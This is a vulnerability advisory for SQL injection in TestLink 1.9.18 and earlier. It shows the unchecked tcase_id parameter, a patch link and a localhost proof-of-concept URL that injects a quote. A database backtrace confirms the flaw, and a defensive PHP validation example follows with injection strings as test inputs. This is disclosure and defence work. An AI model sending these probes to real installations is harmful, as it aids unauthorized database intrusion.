Affected software: TestLink 1.9.18 and prior
Credit: Maksymilian Arciemowicz (CXSECURITY)
Affected code:
----------------
// Both ids are read from the request with no type or format check.
$tcase_id = isset($_REQUEST['tcase_id']) ? $_REQUEST['tcase_id'] : null;
$tcversion_id = isset($_REQUEST['tcversion_id']) ? $_REQUEST['tcversion_id'] : 0;
$info = '';
if( !is_null($tcase_id) )
{
  if($tcversion_id > 0 )
  {
    $tcase = $tcase_mgr->get_by_id($tcase_id,$tcversion_id);
----------------
Patch:
https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/2c85dc8f472f4eedba70a24456be5239dc3045a3
PoC:
http://localhost/lib/ajax/gettestcasesummary.php?tcase_id=1%27
Error message and SQL Syntax:
==============================================================================
DB Access Error - debug_print_backtrace() OUTPUT START
ATTENTION: Enabling more debug info will produce path disclosure weakness (CWE-200)
Having this additional Information could be useful for reporting
issue to development TEAM.
==============================================================================
#0 database->exec_query(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' ) called at [/opt/bitnami/testlink/lib/functions/database.class.php:563]
#1 database->fetchFirstRow(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' ) called at [/opt/bitnami/testlink/lib/functions/database.class.php:545]
#2 database->fetchFirstRowSingleColumn(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' , version) called at [/opt/bitnami/testlink/lib/functions/testcase.class.php:1977]
#3 testcase->get_last_version_info(1') called at [/opt/bitnami/testlink/lib/ajax/gettestcasesummary.php:35]
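
The backtrace shows the tcase_id value placed verbatim after "parent_id =" in the query. One way to reject such values before they reach get_last_version_info() or get_by_id(), as an added example (not TestLink's code and not the linked patch); the helper name request_id() and the sample inputs are assumptions made for illustration:

```php
<?php
// Added example, not TestLink code: strict integer validation for the two
// request parameters read in the affected excerpt.

/**
 * Return $source[$key] as a non-negative integer, or $default when the key
 * is absent. Throws when a value is present but is not a plain integer
 * (quotes, SQL fragments, arrays and negative numbers are all refused).
 */
function request_id(array $source, string $key, ?int $default): ?int
{
    if (!isset($source[$key])) {
        return $default;
    }
    // FILTER_VALIDATE_INT returns false for non-scalar input and for any
    // string that is not an integer literal.
    $id = filter_var($source[$key], FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 0]]);
    if ($id === false) {
        throw new InvalidArgumentException("$key must be a non-negative integer");
    }
    return $id;
}

// Constructed sample requests; the second carries the value from the PoC URL.
$samples = [
    ['tcase_id' => '1', 'tcversion_id' => '3'],
    ['tcase_id' => "1'"],
    ['tcase_id' => '1 OR 1=1'],
    ['tcase_id' => ['1']],
    [],
];

foreach ($samples as $request) {
    try {
        // Same defaults as the affected excerpt: null and 0.
        $tcase_id = request_id($request, 'tcase_id', null);
        $tcversion_id = request_id($request, 'tcversion_id', 0);
        echo json_encode($request), ' => tcase_id=', var_export($tcase_id, true),
             ' tcversion_id=', var_export($tcversion_id, true), "\n";
    } catch (InvalidArgumentException $e) {
        // In the endpoint this would end the request before any query runs.
        echo json_encode($request), ' => rejected: ', $e->getMessage(), "\n";
    }
}
```

Validation at the entry point complements, and does not replace, binding or casting the id where the SQL string is built.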